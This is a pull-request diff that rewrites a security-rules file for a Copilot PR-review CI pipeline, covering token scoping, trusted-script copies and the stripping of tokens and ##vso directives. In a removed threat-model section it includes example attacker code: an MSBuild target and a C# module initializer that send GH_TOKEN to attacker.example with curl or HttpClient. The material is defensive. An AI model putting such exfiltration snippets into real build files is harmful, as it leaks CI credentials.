### PR TITLE
[CI] Refactor ci-copilot pipeline: scope env vars per task

### DIFF
--- a/.github/instructions/ci-copilot-pipeline-security.instructions.md
+++ b/.github/instructions/ci-copilot-pipeline-security.instructions.md
@@ -21,7 +21,7 @@ Once the PR is merged into the worktree, the author controls every `.csproj`, `D
 
 3. **Trusted-copy scripts before merging the PR.** Setup task (still on `main`) copies `.github/scripts`, `.github/skills`, `eng/scripts` to `$(Build.ArtifactStagingDirectory)/trusted-github/`, then `chmod -R a-w`. Later tasks invoke scripts from `$TRUSTED/...`, never from the merged worktree. In PowerShell use `$ScriptsDir` / `$SkillsDir` / `$EngScriptsDir` (canonical impl in `Review-PR.ps1`). New post-merge scripts must be added to the Setup copy block.
 
-4. **Strip tokens before invoking PR-controlled code.** Wrap every `dotnet build|test|run|pack`, `msbuild`, `dotnet cake`, `BuildAndRun*.ps1`, `Run-DeviceTests.ps1`, `verify-tests-fail.ps1`, `Invoke-UITestWithRetry.ps1` in `Invoke-WithoutGhTokens { ... }` (defined in `Review-PR.ps1` — saves/clears/restores `GH_TOKEN`, `GITHUB_TOKEN`, `COPILOT_GITHUB_TOKEN`). Exception: trusted scripts that only call `gh` for PR metadata (`Detect-TestsInDiff.ps1`, `Find-RegressionRisks.ps1`, `detect-ui-test-categories.ps1`) keep the token.
+4. **Strip tokens before invoking PR-controlled code.** Wrap every `dotnet build|test|run|pack`, `msbuild`, `dotnet cake`, `BuildAndRun*.ps1`, `Run-DeviceTests.ps1`, `Invoke-UITestWithRetry.ps1` in `Invoke-WithoutGhTokens { ... }` (defined in `Review-PR.ps1` and `verify-tests-fail.ps1` — saves/clears/restores `GH_TOKEN`, `GITHUB_TOKEN`, `COPILOT_GITHUB_TOKEN`). **Wrap as close to the subprocess as possible, not at the outer trusted-script boundary** — a trusted script may itself need `gh` for metadata (e.g., `verify-tests-fail.ps1` calls `Detect-TestsInDiff.ps1` which uses `gh api`), so wrapping the whole script breaks its detection path. Wrap only the line that launches the PR-controlled process. Exception: scripts that ONLY call `gh` for PR metadata (`Detect-TestsInDiff.ps1`, `Find-RegressionRisks.ps1`, `detect-ui-test-categories.ps1`) don't need wrapping at all — they keep the token.
 
 5. **Cross-phase signal files in `$(Agent.TempDirectory)`** (or `$TRUSTED`), never `$RepoRoot/...`. PR code can overwrite anything in the worktree, including a gate verdict. Readers must not silently fall back to a worktree path if the trusted one is missing.
 
@@ -36,7 +36,7 @@ Once the PR is merged into the worktree, the author controls every `.csproj`, `D
 - [ ] New `checkout: self` has `persistCredentials: false`.
 - [ ] New `env:` block lists only the tokens that task needs; Copilot task has no `GH_TOKEN`.
 - [ ] New post-merge script invoked via `$ScriptsDir` / `$SkillsDir` / `$EngScriptsDir`, not `$RepoRoot/...`, AND added to Setup copy block.
-- [ ] New invocation of PR-controlled code (`dotnet test|build|run`, `BuildAndRun*`, `Run-DeviceTests`, `verify-tests-fail`, `Invoke-UITestWithRetry`) is wrapped in `Invoke-WithoutGhTokens`.
+- [ ] New invocation of PR-controlled code (`dotnet test|build|run`, `BuildAndRun*`, `Run-DeviceTests`, `Invoke-UITestWithRetry`) is wrapped in `Invoke-WithoutGhTokens` AT THE CALL SITE (not at an outer boundary).
 - [ ] New cross-phase state file lives under `$(Agent.TempDirectory)` / `$TRUSTED`.
 - [ ] New PR-stdout pipe uses `tr -d '\r' | sed -E 's/##vso\[[^]]*\]//g'`.
 - [ ] Edited `.github/workflows/*.md` has matching `.lock.yml` regenerated in same commit.

--- a/.github/instructions/ci-copilot-pipeline-security.instructions.md
+++ b/.github/instructions/ci-copilot-pipeline-security.instructions.md
@@ -1,242 +1,52 @@
 ---
-description: "Security rules for the Copilot PR-review pipeline: token scoping, trusted-script copy, PR-controlled code isolation, AzDO/git credential handling."
-applyTo: "eng/pipelines/ci-copilot.yml, .github/scripts/Review-PR.ps1, .github/scripts/Review-PR.Tests.ps1, .github/scripts/BuildAndRunHostApp.ps1, .github/scripts/BuildAndRunSandbox.ps1, .github/scripts/Find-RegressionRisks.ps1, .github/scripts/Post-CodeReview.ps1, .github/scripts/post-inline-review.ps1, .github/scripts/post-ai-summary-comment.ps1, .github/scripts/post-pr-finalize-comment.ps1, .github/scripts/shared/**, .github/skills/pr-review/**, .github/skills/verify-tests-fail-without-fix/**, .github/skills/try-fix/**, .github/skills/run-device-tests/scripts/**, .github/pr-review/**, .github/workflows/review-trigger.yml, .github/workflows/pr-review-queue.yml, .github/workflows/copilot-evaluate-tests.md, .github/workflows/copilot-evaluate-tests.lock.yml, eng/scripts/detect-ui-test-categories.ps1"
+description: "Security rules for the Copilot PR-review pipeline. Read before editing."
+applyTo: "eng/pipelines/ci-copilot.yml, .github/scripts/**, .github/skills/pr-review/**, .github/skills/verify-tests-fail-without-fix/**, .github/skills/try-fix/**, .github/skills/run-device-tests/scripts/**, .github/pr-review/**, .github/workflows/review-trigger.yml, .github/workflows/pr-review-queue.yml, .github/workflows/copilot-evaluate-tests.md, .github/workflows/copilot-evaluate-tests.lock.yml, eng/scripts/detect-ui-test-categories.ps1"
 ---
 
-# CI Copilot Pipeline — Security Rules
+# CI Copilot pipeline — security rules
 
-This pipeline runs **untrusted PR code** (anything contributed in `dotnet/maui` PRs, including PRs from forks) on AzDO hosted agents **with privileged tokens in scope**:
+This pipeline runs **untrusted PR code** on AzDO agents with these tokens in scope:
 
-| Token | Identity | Scope |
-|-------|----------|-------|
-| `GH_COMMENT_TOKEN` (a.k.a. `GH_TOKEN`) | `maui-bot` PAT | comment / label / review on every PR in the repo |
-| `COPILOT_GITHUB_TOKEN` | Copilot app install token | enables the GitHub Copilot CLI |
-| AzDO GitHub service-connection PAT (`dnceng-maui`) | GitHub App install token owned by DncEng | repo contents, PRs, issues, checks, workflows |
+- `GH_COMMENT_TOKEN` / `GH_TOKEN` — `maui-bot` PAT (post comments, labels, reviews on any PR)
+- `COPILOT_GITHUB_TOKEN` — Copilot CLI install token
+- AzDO GitHub service-connection PAT — repo contents, PRs, checks, workflows
 
-A successful exfil of **any** of these = the attacker can take over PR review, post on behalf of the bot, push commits, or worse. Defending against this is non-negotiable when touching any file in this pipeline.
+Exfil of any of these = account/repo takeover. Once the PR is merged into the worktree, the author controls every `.csproj`, `Directory.Build.targets`, source generator, analyzer, test, `.ps1`, and `.yml` the pipeline subsequently runs.
 
----
+## Rules
 
-## Threat model — assume the PR is hostile
+1. **Per-task `env:` scoping.** Only put tokens a task needs. The Copilot-agent task gets `COPILOT_GITHUB_TOKEN` only — never `GH_TOKEN`. Pass `--secret-env-vars=GH_TOKEN,GITHUB_TOKEN,COPILOT_GITHUB_TOKEN` to the Copilot CLI.
 
-By the time Gate runs, the PR's code has been merged into the working tree. The PR author controls:
+2. **`persistCredentials: false` on every `checkout: self`** unless the task pushes. Default checkout writes the service-connection PAT into `.git/config` as `extraheader`, readable by any subprocess.
 
-- every file in the merged worktree (`.csproj`, `Directory.Build.targets`, `Directory.Build.props`, `*.cs`, `*.targets`, `*.props`, `*.yml`, source generators, analyzers, test code, `eng/`, `.github/` if not specifically protected)
-- everything the pipeline subsequently `dotnet build`s, `dotnet test`s, or `pwsh -File`s out of the worktree
-- anything those processes can write to under `$(Build.SourcesDirectory)` (working tree) including spoofing trusted output files
+3. **Trusted-copy scripts before merging the PR.** Setup task (still on `main`) copies `.github/scripts`, `.github/skills`, `eng/scripts` to `$(Build.ArtifactStagingDirectory)/trusted-github/`, then `chmod -R a-w`. Later tasks invoke scripts from `$TRUSTED/...`, never from the merged worktree. In PowerShell use `$ScriptsDir` / `$SkillsDir` / `$EngScriptsDir` (canonical impl in `Review-PR.ps1`). New post-merge scripts must be added to the Setup copy block.
 
-The PR author **cannot** modify files copied to `$(Build.ArtifactStagingDirectory)/trusted-github/` **before** the PR is merged, **as long as those files are made read-only after copy**.
+4. **Strip tokens before invoking PR-controlled code.** Wrap every `dotnet build|test|run|pack`, `msbuild`, `dotnet cake`, `BuildAndRun*.ps1`, `Run-DeviceTests.ps1`, `verify-tests-fail.ps1`, `Invoke-UITestWithRetry.ps1` in `Invoke-WithoutGhTokens { ... }` (defined in `Review-PR.ps1` — saves/clears/restores `GH_TOKEN`, `GITHUB_TOKEN`, `COPILOT_GITHUB_TOKEN`). Exception: trusted scripts that only call `gh` for PR metadata (`Detect-TestsInDiff.ps1`, `Find-RegressionRisks.ps1`, `detect-ui-test-categories.ps1`) keep the token.
 
----
+5. **Cross-phase signal files in `$(Agent.TempDirectory)`** (or `$TRUSTED`), never `$RepoRoot/...`. PR code can overwrite anything in the worktree, including a gate verdict. Readers must not silently fall back to a worktree path if the trusted one is missing.
 
-## Rule 1 — Per-task token scoping (AzDO `env:` block)
+6. **Strip `##vso[...]` from PR-controlled stdout.** Pipe through `tr -d '\r' | sed -E 's/##vso\[[^]]*\]//g'` — bare `sed` misses CRLF lines and the agent will execute the directive.
 
-Each task's `env:` block contains **only** the tokens that exact task needs.
+7. **`gh-aw` workflows.** Pin compiler version (≥ v0.68.4 strips `pull-requests: write` per `gh-aw#28767`). Regenerate `.lock.yml` with `gh aw compile` in the **same commit** as any `.md` frontmatter edit (stale lock ⇒ all dispatches fail). `workflow_dispatch` triggers must restore trusted `.github/` from main (see `Checkout-GhAwPr.ps1`).
 
-```yaml
-# ✅ correct — Task 3 (CopilotReview) gets ONLY the copilot token
-- bash: |
-    pwsh -NoProfile "$TRUSTED/scripts/Review-PR.ps1" -Phase CopilotReview ...
-  env:
-    COPILOT_GITHUB_TOKEN: $(COPILOT_TOKEN)
-    # NO GH_TOKEN here — Copilot can't post comments or push
-```
+8. **No token republish.** Don't `setvariable` a token (visible to every later task, even with `issecret=true`). Don't write tokens to worktree files. Don't echo token names.
 
-```yaml
-# ❌ wrong — leaks the comment token into the Copilot agent's env
-- bash: |
-    pwsh -NoProfile "$TRUSTED/scripts/Review-PR.ps1" -Phase CopilotReview ...
-  env:
-    COPILOT_GITHUB_TOKEN: $(COPILOT_TOKEN)
-    GH_TOKEN: $(GH_COMMENT_TOKEN)
-```
+## Review checklist
 
-When invoking the Copilot CLI, also pass `--secret-env-vars=GH_TOKEN,COPILOT_GITHUB_TOKEN,GITHUB_TOKEN` so the CLI redacts them from its own argv/log output.
+- [ ] New `checkout: self` has `persistCredentials: false`.
+- [ ] New `env:` block lists only the tokens that task needs; Copilot task has no `GH_TOKEN`.
+- [ ] New post-merge script invoked via `$ScriptsDir` / `$SkillsDir` / `$EngScriptsDir`, not `$RepoRoot/...`, AND added to Setup copy block.
+- [ ] New invocation of PR-controlled code (`dotnet test|build|run`, `BuildAndRun*`, `Run-DeviceTests`, `verify-tests-fail`, `Invoke-UITestWithRetry`) is wrapped in `Invoke-WithoutGhTokens`.
+- [ ] New cross-phase state file lives under `$(Agent.TempDirectory)` / `$TRUSTED`.
+- [ ] New PR-stdout pipe uses `tr -d '\r' | sed -E 's/##vso\[[^]]*\]//g'`.
+- [ ] Edited `.github/workflows/*.md` has matching `.lock.yml` regenerated in same commit.
 
-## Rule 2 — `persistCredentials: false` on every `checkout: self`
-
-AzDO's default `checkout: self` writes the service-connection PAT to `.git/config` as:
-
-```
-[http "https://github.com/"]
-    extraheader = AUTHORIZATION: bearer <PAT>
-```
-
-Any subprocess on the runner — including PR-controlled code — can `cat .git/config` and exfiltrate it. **Always** add `persistCredentials: false` unless the task itself needs to push.
-
-```yaml
-# ✅ correct
-- checkout: self
-  persistCredentials: false
-  fetchDepth: 1
-```
-
-```yaml
-# ❌ wrong — service-connection PAT persists in .git/config for the rest of the job
-- checkout: self
-  fetchDepth: 1
-```
-
-This applies to **every** job/stage in this pipeline (the PR-review job, the deep-UI-tests job, the post-comment job, etc.), not just the one that runs the agent.
-
-## Rule 3 — Copy trusted scripts BEFORE the PR is merged, then make them read-only
-
-The Setup task does `checkout: self` of `main` (no PR merge yet) and copies known-good scripts/skills/configs to a trusted directory. Subsequent tasks must invoke those scripts **from the trusted copy**, never from the merged worktree.
+## Grep these during review
 
 ```bash
-# ✅ correct — in Setup task, BEFORE any `git merge` of PR code
-TRUSTED="$(Build.ArtifactStagingDirectory)/trusted-github"
-mkdir -p "$TRUSTED"
-cp -r .github/scripts "$TRUSTED/scripts"
-cp -r .github/skills  "$TRUSTED/skills"
-cp -r eng/scripts     "$TRUSTED/eng-scripts"
-chmod -R a-w "$TRUSTED"   # ← prevents PR code from rewriting trusted scripts at runtime
-```
-
-When adding a new pipeline step that invokes a `.ps1`/`.sh`/`.py` script from the repo, follow the convention in `Review-PR.ps1`:
-
-```powershell
-# ✅ correct — resolve via the trusted dir
-$ScriptsDir    = if ($TrustedScriptsDir) { Join-Path $TrustedScriptsDir 'scripts' }     else { $PSScriptRoot }
-$SkillsDir     = if ($TrustedScriptsDir) { Join-Path $TrustedScriptsDir 'skills' }      else { Join-Path $PSScriptRoot '../skills' }
-$EngScriptsDir = if ($TrustedScriptsDir) { Join-Path $TrustedScriptsDir 'eng-scripts' } else { Join-Path $PSScriptRoot '../../eng/scripts' }
-
-& "$SkillsDir/foo/scripts/foo.ps1" ...
-```
-
-```powershell
-# ❌ wrong — runs the PR's version of the script, with all of Gate's tokens in env
-$detectScript = Join-Path $RepoRoot "eng/scripts/detect-ui-test-categories.ps1"
-& $detectScript -PRNumber $PRNumber
-```
-
-**If you add a new script** that needs to be invoked after PR merge, you must also add it to the Setup-task copy block and reference it via the corresponding `$*Dir` variable.
-
-## Rule 4 — Strip tokens from env before invoking PR-controlled code
-
-Even when the *calling* script is trusted, the *subprocess* may be PR-controlled. `dotnet build`/`dotnet test`/`dotnet run` execute the PR's MSBuild graph (`Directory.Build.targets`, `.csproj` `<Target>` blocks, source generators, analyzers, then the test/app code). Any of those can read `Environment.GetEnvironmentVariable("GH_TOKEN")` or `$(GH_TOKEN)` MSBuild property and exfiltrate via:
-
-```xml
-<!-- attacker's Directory.Build.targets -->
-<Target Name="Exfil" BeforeTargets="Build">
-  <Exec Command="curl attacker.example/?t=$(GH_TOKEN)" />
-</Target>
-```
-
-```csharp
-// attacker's test code
-[ModuleInitializer]
-public static void Leak() => HttpClient.GetAsync("attacker.example/?t=" +
-    Environment.GetEnvironmentVariable("GH_TOKEN"));
-```
-
-The same applies to invocations of `BuildAndRunHostApp.ps1`, `Run-DeviceTests.ps1`, `verify-tests-fail.ps1`, `Invoke-UITestWithRetry.ps1` — all of these *internally* run `dotnet build`/`dotnet test` against PR code.
-
-Use the `Invoke-WithoutGhTokens` helper in `Review-PR.ps1` (or add an equivalent if writing a new orchestration script):
-
-```powershell
-# ✅ correct — token stripped for the subprocess only, restored after
-$testOutput = Invoke-WithoutGhTokens {
-    dotnet test $resolvedProj --filter $t.Filter --logger "console;verbosity=minimal" 2>&1
-}
-```
-
-```powershell
-# ❌ wrong — Gate has GH_TOKEN in env; the PR-modified .csproj inherits it
-$testOutput = dotnet test $resolvedProj --filter $t.Filter ...
-```
-
-**Trusted metadata-fetch scripts** (`Detect-TestsInDiff.ps1`, `Find-RegressionRisks.ps1`, `detect-ui-test-categories.ps1`) call `gh` CLI and **need** `GH_TOKEN`. Don't wrap them. The split is: *trusted script reading PR metadata via `gh`* → keeps `GH_TOKEN`; *trusted script invoking PR-controlled code* → wraps in `Invoke-WithoutGhTokens`.
-
-## Rule 5 — Cross-phase signal files live outside the working tree
-
-The merged worktree is writable by any PR-controlled process. Anything the next phase trusts (gate verdict, sentinel files, category lists, phase-complete markers) must be written to `$(Agent.TempDirectory)` (or `$TRUSTED`), **never** to a path inside `$RepoRoot`.
-
-```powershell
-# ✅ correct — Agent.TempDirectory is per-job, outside the worktree, not writable by PR code
-$gateVerdictDir = if ($env:AGENT_TEMPDIRECTORY) { $env:AGENT_TEMPDIRECTORY } else { Join-Path $RepoRoot "CustomAgentLogsTmp/..." }
-"PASS" | Set-Content (Join-Path $gateVerdictDir "gate-result.txt")
-```
-
-```powershell
-# ❌ wrong — a malicious test in the PR can overwrite gate-result.txt with "PASS"
-"PASS" | Set-Content (Join-Path $RepoRoot "CustomAgentLogsTmp/.../gate-result.txt")
-```
-
-The corresponding sentinel-read in a later phase MUST live at the same trusted location and MUST NOT silently fall back to the worktree path if missing.
-
-## Rule 6 — Strip `##vso[...]` from PR-controlled output
-
-`##vso[task.setvariable variable=X]value` lines in stdout are interpreted by the AzDO agent as commands to set pipeline variables. PR-controlled code (test output, build output) must have those stripped before the agent sees them, otherwise the PR can promote attacker-controlled values into pipeline variables read by subsequent tasks.
-
-```bash
-# ✅ correct — strip CR (Windows line endings would slip past a simpler regex), then drop vso commands
-"$TRUSTED/scripts/Review-PR.ps1" ... 2>&1 | tr -d '\r' | sed -E 's/##vso\[[^]]*\]//g'
-```
-
-```bash
-# ❌ wrong — bare sed won't match if PR output has CRLF line endings
-"$TRUSTED/scripts/Review-PR.ps1" ... 2>&1 | sed 's/##vso\[.*\]//g'
-```
-
-## Rule 7 — `gh-aw` workflows: pin version, regenerate `.lock.yml`, restore trusted `.github/`
-
-For files under `.github/workflows/shared/` and any `gh-aw` `.md` workflow:
-
-- **Pin the gh-aw compiler version.** Versions ≥ v0.68.4 strip required permissions (`pull-requests: write`) — see `gh-aw#28767`. Pin to a known-good version in the workflow frontmatter.
-- **Regenerate the `.lock.yml`** with `gh aw compile` **in the same commit** as any `.md` frontmatter change. A stale lock file causes every dispatch to fail with `ERR_CONFIG: Lock file ... is outdated!`.
-- **`workflow_dispatch` triggers must restore trusted `.github/` from main** (use `.github/scripts/Checkout-GhAwPr.ps1` pattern) so that a malicious PR can't supply its own workflow logic via `workflow_dispatch`.
-
-## Rule 8 — Don't pass tokens through pipeline variables that subsequent tasks read
-
-```yaml
-# ❌ wrong — once written to AzDO variable store, the value is visible to every later task
-- bash: echo "##vso[task.setvariable variable=MyToken;issecret=true]$(GH_TOKEN)"
-```
-
-Tokens come from variable groups linked at the pipeline level. Don't republish them. Don't write them to files in the worktree. Don't `echo` them — even with `issecret=true`, this widens the blast radius.
-
----
-
-## Code-review checklist for this surface
-
-When reviewing or authoring a change to any file matched by this instruction's `applyTo`, walk this list:
-
-- [ ] Every new/modified AzDO `checkout: self` has `persistCredentials: false` (unless the task pushes, in which case add a comment explaining why).
-- [ ] Every new/modified `env:` block on a task contains **only** the tokens that task needs. The Copilot-agent task never has `GH_TOKEN`.
-- [ ] Every new script invoked from the pipeline after PR merge is resolved via `$ScriptsDir` / `$SkillsDir` / `$EngScriptsDir` (or the calling script's equivalent), not `$RepoRoot/...`.
-- [ ] If a new script was added to `.github/scripts/`, `.github/skills/`, or `eng/scripts/` that needs to run post-merge, it's covered by the trusted-copy block in `ci-copilot.yml` Setup task.
-- [ ] Every new invocation of `dotnet build|test|run|pack`, `msbuild`, `dotnet cake`, `BuildAndRunHostApp.ps1`, `BuildAndRun*.ps1`, `Run-DeviceTests.ps1`, `verify-tests-fail.ps1`, `Invoke-UITestWithRetry.ps1`, or any other process that executes PR-controlled code is wrapped in `Invoke-WithoutGhTokens { ... }`.
-- [ ] Every cross-phase signal file (verdict, sentinel, intermediate state) is written to `$(Agent.TempDirectory)` / `$TRUSTED`, never to `$RepoRoot/...`.
-- [ ] Any new pipeline output that includes stdout from PR-controlled code is filtered with `tr -d '\r' | sed -E 's/##vso\[[^]]*\]//g'`.
-- [ ] If a `.github/workflows/*.md` (gh-aw) was edited, the corresponding `.lock.yml` was regenerated with `gh aw compile` in the same commit.
-- [ ] Token names are never written to log lines, even with `Write-Host`/`echo`. Token *values* are never written to files in the worktree.
-
-## Anti-patterns to grep for during review
-
-```bash
-# Token leak to PR-controlled subprocess
-git grep -nE 'dotnet (test|build|run|pack)' eng/pipelines/ci-copilot.yml .github/scripts/ .github/skills/ | grep -v Invoke-WithoutGhTokens
-
-# Script invoked from PR worktree instead of trusted copy
-git grep -nE 'Join-Path \$RepoRoot ".*\.(ps1|sh)"' .github/scripts/ .github/skills/
-
-# Missing persistCredentials
+git grep -nE 'dotnet (test|build|run|pack)' eng/pipelines/ci-copilot.yml .github/scripts .github/skills | grep -v Invoke-WithoutGhTokens
+git grep -nE 'Join-Path \$RepoRoot ".*\.(ps1|sh)"' .github/scripts .github/skills
 git grep -nA1 'checkout: self' eng/pipelines/ci-copilot.yml | grep -v persistCredentials
-
-# Cross-phase state in worktree
-git grep -nE 'Set-Content.*\$RepoRoot.*(gate-result|sentinel|verdict)' .github/scripts/ .github/skills/
-
-# Bare ##vso strip without CR handling
-git grep -nE "sed.*##vso" eng/pipelines/ci-copilot.yml | grep -v "tr -d"
+git grep -nE 'Set-Content.*\$RepoRoot.*(gate-result|sentinel|verdict)' .github/scripts .github/skills
+git grep -nE 'sed.*##vso' eng/pipelines/ci-copilot.yml | grep -v 'tr -d'
 ```
-
----
-
-## References
-
-- **PR #35324** — refactor that introduced the 4-task split and surfaced these issues
-- **MauiBot 2026-05-24 review** of PR #35324 — flagged Rules 3 and 4 violations
-- **PR #35376** — earlier change that re-introduced missing `persistCredentials: false` on cross-stage checkouts
-- **`Review-PR.ps1`** — canonical implementation of `$ScriptsDir`/`$SkillsDir`/`$EngScriptsDir` resolution and `Invoke-WithoutGhTokens` helper
-- **`ci-copilot.yml` Setup task** — canonical trusted-copy + `chmod -R a-w` pattern

--- a/.github/instructions/ci-copilot-pipeline-security.instructions.md
+++ b/.github/instructions/ci-copilot-pipeline-security.instructions.md
@@ -1,6 +1,12 @@
 ---
 description: "Security rules for the Copilot PR-review pipeline. Read before editing."
-applyTo: "eng/pipelines/ci-copilot.yml, .github/scripts/**, .github/skills/pr-review/**, .github/skills/verify-tests-fail-without-fix/**, .github/skills/try-fix/**, .github/skills/run-device-tests/scripts/**, .github/pr-review/**, .github/workflows/review-trigger.yml, .github/workflows/pr-review-queue.yml, .github/workflows/copilot-evaluate-tests.md, .github/workflows/copilot-evaluate-tests.lock.yml, eng/scripts/detect-ui-test-categories.ps1"
+applyTo:
+  - "eng/pipelines/ci-copilot.yml"
+  - "eng/scripts/detect-ui-test-categories.ps1"
+  - ".github/scripts/**"
+  - ".github/pr-review/**"
+  - ".github/skills/{pr-review,verify-tests-fail-without-fix,try-fix,run-device-tests}/**"
+  - ".github/workflows/{review-trigger,pr-review-queue,copilot-evaluate-tests}.*"
 ---
 
 # CI Copilot pipeline — security rules

--- a/.github/instructions/ci-copilot-pipeline-security.instructions.md
+++ b/.github/instructions/ci-copilot-pipeline-security.instructions.md
@@ -1,12 +1,6 @@
 ---
 description: "Security rules for the Copilot PR-review pipeline. Read before editing."
-applyTo:
-  - "eng/pipelines/ci-copilot.yml"
-  - "eng/scripts/detect-ui-test-categories.ps1"
-  - ".github/scripts/**"
-  - ".github/pr-review/**"
-  - ".github/skills/{pr-review,verify-tests-fail-without-fix,try-fix,run-device-tests}/**"
-  - ".github/workflows/{review-trigger,pr-review-queue,copilot-evaluate-tests}.*"
+applyTo: "eng/pipelines/ci-copilot.yml,eng/scripts/detect-ui-test-categories.ps1,.github/scripts/**,.github/pr-review/**,.github/skills/pr-review/**,.github/skills/verify-tests-fail-without-fix/**,.github/skills/try-fix/**,.github/skills/run-device-tests/**,.github/workflows/review-trigger.yml,.github/workflows/pr-review-queue.yml,.github/workflows/copilot-evaluate-tests.*"
 ---
 
 # CI Copilot pipeline — security rules
@@ -17,7 +11,7 @@ This pipeline runs **untrusted PR code** on AzDO agents with these tokens in sco
 - `COPILOT_GITHUB_TOKEN` — Copilot CLI install token
 - AzDO GitHub service-connection PAT — repo contents, PRs, checks, workflows
 
-Exfil of any of these = account/repo takeover. Once the PR is merged into the worktree, the author controls every `.csproj`, `Directory.Build.targets`, source generator, analyzer, test, `.ps1`, and `.yml` the pipeline subsequently runs.
+Once the PR is merged into the worktree, the author controls every `.csproj`, `Directory.Build.targets`, source generator, analyzer, test, `.ps1`, and `.yml` the pipeline subsequently runs.
 
 ## Rules
 

--- a/.github/instructions/ci-copilot-pipeline-security.instructions.md
+++ b/.github/instructions/ci-copilot-pipeline-security.instructions.md
@@ -1,0 +1,242 @@
+---
+description: "Security rules for the Copilot PR-review pipeline: token scoping, trusted-script copy, PR-controlled code isolation, AzDO/git credential handling."
+applyTo: "eng/pipelines/ci-copilot.yml, .github/scripts/Review-PR.ps1, .github/scripts/Review-PR.Tests.ps1, .github/scripts/BuildAndRunHostApp.ps1, .github/scripts/BuildAndRunSandbox.ps1, .github/scripts/Find-RegressionRisks.ps1, .github/scripts/Post-CodeReview.ps1, .github/scripts/post-inline-review.ps1, .github/scripts/post-ai-summary-comment.ps1, .github/scripts/post-pr-finalize-comment.ps1, .github/scripts/shared/**, .github/skills/pr-review/**, .github/skills/verify-tests-fail-without-fix/**, .github/skills/try-fix/**, .github/skills/run-device-tests/scripts/**, .github/pr-review/**, .github/workflows/review-trigger.yml, .github/workflows/pr-review-queue.yml, .github/workflows/copilot-evaluate-tests.md, .github/workflows/copilot-evaluate-tests.lock.yml, eng/scripts/detect-ui-test-categories.ps1"
+---
+
+# CI Copilot Pipeline — Security Rules
+
+This pipeline runs **untrusted PR code** (anything contributed in `dotnet/maui` PRs, including PRs from forks) on AzDO hosted agents **with privileged tokens in scope**:
+
+| Token | Identity | Scope |
+|-------|----------|-------|
+| `GH_COMMENT_TOKEN` (a.k.a. `GH_TOKEN`) | `maui-bot` PAT | comment / label / review on every PR in the repo |
+| `COPILOT_GITHUB_TOKEN` | Copilot app install token | enables the GitHub Copilot CLI |
+| AzDO GitHub service-connection PAT (`dnceng-maui`) | GitHub App install token owned by DncEng | repo contents, PRs, issues, checks, workflows |
+
+A successful exfil of **any** of these = the attacker can take over PR review, post on behalf of the bot, push commits, or worse. Defending against this is non-negotiable when touching any file in this pipeline.
+
+---
+
+## Threat model — assume the PR is hostile
+
+By the time Gate runs, the PR's code has been merged into the working tree. The PR author controls:
+
+- every file in the merged worktree (`.csproj`, `Directory.Build.targets`, `Directory.Build.props`, `*.cs`, `*.targets`, `*.props`, `*.yml`, source generators, analyzers, test code, `eng/`, `.github/` if not specifically protected)
+- everything the pipeline subsequently `dotnet build`s, `dotnet test`s, or `pwsh -File`s out of the worktree
+- anything those processes can write to under `$(Build.SourcesDirectory)` (working tree) including spoofing trusted output files
+
+The PR author **cannot** modify files copied to `$(Build.ArtifactStagingDirectory)/trusted-github/` **before** the PR is merged, **as long as those files are made read-only after copy**.
+
+---
+
+## Rule 1 — Per-task token scoping (AzDO `env:` block)
+
+Each task's `env:` block contains **only** the tokens that exact task needs.
+
+```yaml
+# ✅ correct — Task 3 (CopilotReview) gets ONLY the copilot token
+- bash: |
+    pwsh -NoProfile "$TRUSTED/scripts/Review-PR.ps1" -Phase CopilotReview ...
+  env:
+    COPILOT_GITHUB_TOKEN: $(COPILOT_TOKEN)
+    # NO GH_TOKEN here — Copilot can't post comments or push
+```
+
+```yaml
+# ❌ wrong — leaks the comment token into the Copilot agent's env
+- bash: |
+    pwsh -NoProfile "$TRUSTED/scripts/Review-PR.ps1" -Phase CopilotReview ...
+  env:
+    COPILOT_GITHUB_TOKEN: $(COPILOT_TOKEN)
+    GH_TOKEN: $(GH_COMMENT_TOKEN)
+```
+
+When invoking the Copilot CLI, also pass `--secret-env-vars=GH_TOKEN,COPILOT_GITHUB_TOKEN,GITHUB_TOKEN` so the CLI redacts them from its own argv/log output.
+
+## Rule 2 — `persistCredentials: false` on every `checkout: self`
+
+AzDO's default `checkout: self` writes the service-connection PAT to `.git/config` as:
+
+```
+[http "https://github.com/"]
+    extraheader = AUTHORIZATION: bearer <PAT>
+```
+
+Any subprocess on the runner — including PR-controlled code — can `cat .git/config` and exfiltrate it. **Always** add `persistCredentials: false` unless the task itself needs to push.
+
+```yaml
+# ✅ correct
+- checkout: self
+  persistCredentials: false
+  fetchDepth: 1
+```
+
+```yaml
+# ❌ wrong — service-connection PAT persists in .git/config for the rest of the job
+- checkout: self
+  fetchDepth: 1
+```
+
+This applies to **every** job/stage in this pipeline (the PR-review job, the deep-UI-tests job, the post-comment job, etc.), not just the one that runs the agent.
+
+## Rule 3 — Copy trusted scripts BEFORE the PR is merged, then make them read-only
+
+The Setup task does `checkout: self` of `main` (no PR merge yet) and copies known-good scripts/skills/configs to a trusted directory. Subsequent tasks must invoke those scripts **from the trusted copy**, never from the merged worktree.
+
+```bash
+# ✅ correct — in Setup task, BEFORE any `git merge` of PR code
+TRUSTED="$(Build.ArtifactStagingDirectory)/trusted-github"
+mkdir -p "$TRUSTED"
+cp -r .github/scripts "$TRUSTED/scripts"
+cp -r .github/skills  "$TRUSTED/skills"
+cp -r eng/scripts     "$TRUSTED/eng-scripts"
+chmod -R a-w "$TRUSTED"   # ← prevents PR code from rewriting trusted scripts at runtime
+```
+
+When adding a new pipeline step that invokes a `.ps1`/`.sh`/`.py` script from the repo, follow the convention in `Review-PR.ps1`:
+
+```powershell
+# ✅ correct — resolve via the trusted dir
+$ScriptsDir    = if ($TrustedScriptsDir) { Join-Path $TrustedScriptsDir 'scripts' }     else { $PSScriptRoot }
+$SkillsDir     = if ($TrustedScriptsDir) { Join-Path $TrustedScriptsDir 'skills' }      else { Join-Path $PSScriptRoot '../skills' }
+$EngScriptsDir = if ($TrustedScriptsDir) { Join-Path $TrustedScriptsDir 'eng-scripts' } else { Join-Path $PSScriptRoot '../../eng/scripts' }
+
+& "$SkillsDir/foo/scripts/foo.ps1" ...
+```
+
+```powershell
+# ❌ wrong — runs the PR's version of the script, with all of Gate's tokens in env
+$detectScript = Join-Path $RepoRoot "eng/scripts/detect-ui-test-categories.ps1"
+& $detectScript -PRNumber $PRNumber
+```
+
+**If you add a new script** that needs to be invoked after PR merge, you must also add it to the Setup-task copy block and reference it via the corresponding `$*Dir` variable.
+
+## Rule 4 — Strip tokens from env before invoking PR-controlled code
+
